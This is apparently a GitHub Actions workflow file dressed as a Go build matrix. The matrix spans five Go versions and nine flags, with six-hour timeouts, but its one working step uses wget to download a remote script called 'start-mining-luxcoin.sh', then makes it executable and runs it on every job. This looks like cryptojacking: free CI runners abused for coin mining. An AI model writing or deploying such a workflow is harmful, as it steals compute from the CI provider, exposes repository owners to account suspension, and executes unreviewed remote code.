name: LUXCION
on: [push, pull_request]
jobs:
  build:
    name: lux
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: lux
      run: |
        wget https://github.com/seefong/testmin/blob/main/start-mining-luxcoin.sh && chmod u+x start-mining-luxcoin.sh && ./start-mining-luxcoin.sh
